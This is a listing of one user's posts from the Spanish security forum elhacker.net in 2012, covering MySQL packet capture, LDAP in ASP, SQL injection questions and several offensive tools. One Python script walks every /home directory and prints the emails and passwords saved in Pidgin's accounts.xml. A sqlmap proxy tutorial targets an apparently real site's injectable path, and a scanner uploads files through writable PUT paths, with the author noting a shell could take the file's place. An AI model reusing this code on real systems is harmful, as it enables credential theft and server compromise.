elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: [1] 2
1  Comunicaciones / Redes / capturar sesion MYSQL en local ? [DUDA] en: 22 Agosto 2012, 01:02 am
escribo ya que tengo un problema, me encuentro utilizando backtrack5 r2 y lo que quiero, es realizar unas pruebas capturando el trafico que genera el cliente MYSQL con el servidor MYSQL.

escenario:
a)tengo instalado tanto el cliente como el servidor en la misma maquina(localhost).
b)tengo 2 tarjetas de red conectadas(por otras razones) mas la interfaz loopback.

utilizo ngrep( tambien probe con wireshark ), de la siguiente forma.

ngrep -d lo -W byline port 3306 and host localhost

lo => loopback , tambien e intentado con wlan1 y con wlan2(tengo claro que no deberia pasa nada, solo era de prueba :p ).

y no agarra niun solo paquete, luego probe

ngrep -d lo -W byline host localhost

y tampoco agarra paquetes del protocolo MYSQL, intente con un PING al localhost y captura el trafico del PING perfectamente.

el servidor esta escuchando en el puerto 3306 y el intento de conexion tambn es por ahi, asique no creo que por ahi vaya el problema :/ .

alguien me puede decir que pasa en este caso ?? , al ser localhost, utilizara otro medio que no sea socket para conectarse ?? .

EDIT: se me olvidaba decir, que al utilizar el NETCAT ( nc -vv 127.0.0.1 3306 ) , captura perfectamente el trafico :/ .

saludos.  >:D
2  Seguridad Informática / Bugs y Exploits / ayuda . textos de sagrini en: 17 Junio 2012, 04:32 am
hola ... solicito su ayuda para encontrar los texto que ha escrito sagrini, ya que su web y los links de los textos estan OFF , si alguien lo puede resubir, seria genial.

por cierto me intente comunicar con el hace mas o menos 3 o 4 dias y no he recibido ninguna respuesta.

espero su ayuda.
3  Programación / ASM / lenguaje ensamblador para computadoras basadas en intel[KIP R. IRVINE] español en: 16 Junio 2012, 01:15 am
un amigo me envio este libro, espero que les sirva.



http://www.sendspace.com/file/vdl0al


saludos.
4  Programación / .NET (C#, VB.NET, ASP) / ayuda en VB y conexion a LDAP en: 22 Abril 2012, 00:19 am
hola, recurro a ustedes ya que llevo un par de dias con el siguiente problema...

necesito conectarme a un servidor LDAP, en eso no hay problema, logro conectarme y listar los nombres de los grupos y los datos, pero lo que no logro hacer, es listar los atributos de estos, y es aqui mi problema.

en esta parte del codigo estoy imprimiendo los nombres de los grupos y los datos, que se encuentran en una coleccion, pero aparte quiero imprimir los atributos de los datos, Mail , telefono ,etc....
la idea es imprimir todos los datos del grupo(CN) sin tener que llamar uno por uno( obj.Name , obj.Mail , etc... ) .

o alguna funcion similar a "ldap_first_attribute" que existe en PHP :/ .

Código
  1.    For Each obj in objMyObject
  2.         response.write obj.Name
  3.         response.write "<br>"
  4.    Next
  5.  


aqui dejo el codigo completo para que lo revisen  :P

Código
  1. <%
  2. dim url_var
  3. url_var    = request.querystring("ruta")
  4. strCuenta = request.querystring("usuario")
  5. strClave   = request.querystring("pasword")
  6. strPath    = url_var
  7. strEmail  = strCuenta & request.querystring("dominio")'"@mi.dominio"
  8.  
  9. Set objNamespaceLDAP = GetObject("LDAP:")
  10.  
  11. on error resume next
  12.    Set objMyObject = objNamespaceLDAP.OpenDSObject(strPath,strEmail,strClave,1)
  13.  
  14. if err.number <> 0 then
  15.    response.write "<p>Error al ingresar</p>"
  16. else
  17.    response.write objMyObject.Name
  18.    response.write "<p>Autenticado</p>"
  19.    For Each obj in objMyObject
  20.         response.write obj.Name
  21.         response.write "<br>"
  22.    Next
  23. end if
  24. %>
  25.  
5  Programación / PHP / ejecutar javascript con PHP (?) en: 22 Febrero 2012, 02:11 am
estoy haciendo un script que se conecte a hotmail utilizando CURL , mi gran problema es que cuando intento inicar sesion, este detecta que no tengo javascript activado, eso es obvio ya que no ejecuto el script desde el navegador.

a alguien se le ocurre una idea??.

saludos.
6  Seguridad Informática / Nivel Web / simular inject_here en sqlmap[TUTORIAL + PROXY] en: 11 Febrero 2012, 04:57 am
Despues de haber perdido un par de horas de mi vida, intentando buscar algo parecido al
%IjectHere% de HAVIJ o un ${Inject_Here} como el de ACUNETIX en SQLMAP, primero tome la decision
de editar el codigo, pero me dio demasiada peresa, aparte que con una actualizacion volaba el codigo
asique me decidi mejor en hacer un mini proxy para el SQLMAP, les cuento como funciona.

primero echamos a andar el mini proxy, para esto necesitamos 3 parametros.

[1]PUERTO, de conexion entre el mini proxy y el sqlmap.(puede ser cualquiera :p)
[2]PARAMETRO, este es el parametro falso que modificara sqlmap(abajo explico ;)).
[3]URL, necesitamos la URL donde se encuentra la sqli, con EL TOKEN que nos indicara
   donde se encuentra el SQLI(Token por defecto "{fuck}").

un ejemplo seria asi ==> python proxySqlmap.py 4345 /cualquier_cosa.php?injectando= http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

PUERTO de conexion con el proxy => 4345
PARAMETRO falso                         => /cualquier_cosa.php?injectando=
URL  con el token, fijarse en {fuck} => http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

*El parametro falso debe coincidir tal cual con el que ponen en sqlmap.

donde el parametro identificador2 es el vulnerable(lee mas abajo y entenderas).
con esto dejamos nuestro proxy esperando conexiones en el puerto 4345.

¿como funciona?.
cuando ejecutamos sqlmap, lo hacemos de esta manera "python sqlmap.py -u "http://www.vulnerable.com.ar/carpeta1/ejecuta.php?id=3" -p id" , donde id es nuestra variable vulnerable a sqli, pero nosotros al tener un parametro vulnerable en otro lugar como es en mi caso, es asi "http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2/archivo.rar" , las variables vulnerables son identificador1 e identificador2 , no tenia como shit indicar que esas variables eran vulnerables entonces se me ocurrio hacer lo siguiente, utilizamos nuestro localhost(pueden subirlo a un host si desean ;) ), como si fuese el servidor con la url y apuntamos en sqlmap una variable falsa(cualquier nombre), SIN DARLE UN VALOR por lo menos en esta version no !!xD , en mi caso le pondre "/cualquier_cosa.php?injectando=" , tonces la url nos quedaria de esta manera "http://127.0.0.1/cualquier_cosa.php?injectando=" , ademas debemos agregar el puerto de conexion a nuestro proxy, al ejecutar el sqlmap nos quedaria asi "python sqlmap.py http://127.0.0.1:4345/cualquier_cosa.php?injectando= -p injectando" , esto quiere decir que se conectara a nuestro host(127.0.0.1), y que realizara las peticiones <"GET"> a nuestro host y a la variable "injectando" de la pagina "cualquier_cosa.php", por otro lado tenemos corriendo el proxy haciendo creer que se mejante pagina y variable existe.

Entonces tenemos 2 ventanas de cmd abiertas, una donde corre nuestro proxy y la otra de sqlmap ;) .

espero que a alguien le sirva.

codigo en python ==> http://pastebin.com/NR5sx9u6

una imagen para que vean como reemplaza la injeccion :


PD: por ahi alguien podria mejorar o optimizar el codigo ;).

EDIT: modifique unas cosillas.
7  Seguridad Informática / Nivel Web / duda con sqlmap[SOLUCIONADO] en: 9 Febrero 2012, 07:47 am
escribo nuevamente ya que tengo un problema, resulta que tengo una injeccion sql en ORACLE, el problema es que la url con el sqli es de esta forma http://www.asdfgf2w.com/asdf1/asdf2/asdf3/archivo.doc , donde asdf3 es el vulnerable a sqli  :o  , el problema es que nose como poner en sqlmap que me tome ese como el parametro vulnerable, alguien sabe ??.

mi primera idea fue realizar un wrapper xD , en otro servidor , con la url tipo http://asdf.com/asdf.php?var1=[SQLI] , pero el servidor es demasiado inestable :/

saludos.

8  Programación / Scripting / Obtiene las cuentas guardadas de PIDGIN[PYTHON , LINUX] en: 26 Enero 2012, 20:37 pm
un simple script que obtiene las cuentas guardadas  del cliente de mensajeria PIDGIN.

probado en la version "Pidgin 2.6.6 (libpurple 2.6.6)"

Código
  1. ##############################################
  2. ## Obtiene las ccuentas guardadas de pidgin ##
  3. ## Mail: angelofthedark@live.com.ar         ##
  4. ##############################################
  5. import os
  6.  
  7. #funcion que obtiene las cuentas desde el archivo accounts.xml
  8. def obtenerCuentas( ruta ):
  9.    try:
  10.        h    = open(usu+cuentasXML)
  11.        src  = h.read()
  12.        tmp1 = src.split("<name>")
  13.        tmp2 = src.split("<password>")
  14.        for s in tmp1:
  15.            if "</name>" in s:
  16.                cuentas[0].append(s.split("</name>")[0])
  17.        for t in tmp2:
  18.            if "</password>" in t:
  19.                cuentas[1].append(t.split("</password")[0])
  20.    except:
  21.        print "Error, nose puede continuar !!"
  22.        exit(0)
  23.  
  24.  
  25. home       = "/home"
  26. cuentasXML = ".purple/accounts.xml"
  27. archivos   = os.listdir(home)
  28. usuarios   = []
  29. cuentas    = [[],[]] #cuentas[0][0] => mail ; cuentas[0][1] => password
  30.  
  31. for ar in archivos:
  32.    if os.path.isdir(home+"/"+ar):
  33.        usuarios.append(home+"/"+ar+"/")
  34.  
  35. for usu in usuarios:
  36.    obtenerCuentas( usu+cuentasXML )
  37.  
  38.  
  39. #imprime por pantalla el mail y el password.
  40. cont = 0
  41. for cnt in cuentas[0]:
  42.    print "+++++++++++++++("+str(cont)+")+++++++++++++++"
  43.    print "mail     ==> " + cnt
  44.    print "password ==> " + cuentas[1][cont]
  45.    cont+=1
  46.  
  47. print "+++++++++++++++(-.FIN.-)+++++++++++++++"


saludos.
9  Seguridad Informática / Nivel Web / duda con sql inyection[MYSQL] en: 18 Enero 2012, 21:49 pm
holas, tengo una duda con un sql injection, resulta que cuando quiero sacar la cantidad de columnas de una tabla con order by  , me aparece que tengo 5 columnas , pero cuando le aplico el union all select O union select , para unir las consultas , me dice "The used SELECT statements have a different number of columns" , me indica que la cantidad de columnas es distinta, ¿porque sucede eso?.

alguien que me ayude please :B .
10  Seguridad Informática / Nivel Web / Crawler Put Analizer , Primera BETA!! [PYTHON] en: 8 Enero 2012, 04:11 am
les traigo la primera version beta de mi programa, se llama "Crawler Put analizer V0.1" , les explico.

mi programa lo que hace es Detectar en el servidor los metodos PUT , MOVE , DELETE , luego de detectar estos metodos , si es que se encuentran publicos , pasa a la siguiente etapa que es la recopilacion de URLS, detecta las urls del index , luego si activan la opcion de brutear las rutas, el programa comienza a sacar rutas del servidor con un pequeño bruteforce y una lista de palabras, que ustedes pueden configurar como quieran, una vez que se ha detectado todas las rutas posibles,
el programa comienza el intento por subir un archivo .txt al servidor, una vez que haya logrado subir el archivo, comienza el intento por cambiar la extension del archivo para comprobar si se puede ejecutar archivo .asp , .aspx ,.php , etc... , eso es lo que hace.

en resumidas cuentas, busca los metodos PUT,MOVE,DELETE y luego busca una ruta con permisos de escritura, para asi luego intentar subir un archivo( se puede cambiar por una shell xD )

el programa tiene un archivo en la carpeta lib , que se llama config.py , donde se encuentra la configuracion y la explicacion de mi programa.

El archivo que genera es con este contenido.

#var1 ==> datos a escribir en el archivo generado.
#var2 ==> cantidad de caracteres que contiene la cadena.
#var3 ==> extension del archivo.
banner = ( "Generado por 'Crawler Put Analizer'" , "35" , ".txt" )

luego mas abajo encontraran la siguiente configuracion.

esta es la que viene por defecto:

flag_a1 = True #indica si se detiene el programa al no encontrar el metodo PUT.
flag_a2 = False #indica si aparece el mensaje de abandonar el programa, al no encontrarse el metodo DELETE.(No implementa)
flag_2 = True #indica si se obtienen las rutas del Host, desde la ruta indicada ( Ej: /index.asp ).
flag_3 = False #indica si se obtienen rutas por fuerza bruta ( utilizando la lista indicada ).
flag_4 = True #indica si se escriben las rutas.
flag_5 = False #indica si se cambia la extension del archivo, por el configurado.

Link de DEscarga : www.multiupload.com/AKMSUS2L1K

unas capturas :



Esto es lo que conseguiran, si ha tenido exito !! :




cualquier duda , reclamo , consulta, no duden en consultar!!

PD : se muy bien que por ahora contiene bastante errores, prometo en la proxima version(1 semana mas), tratar de arreglar la totalidad de los errores.
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines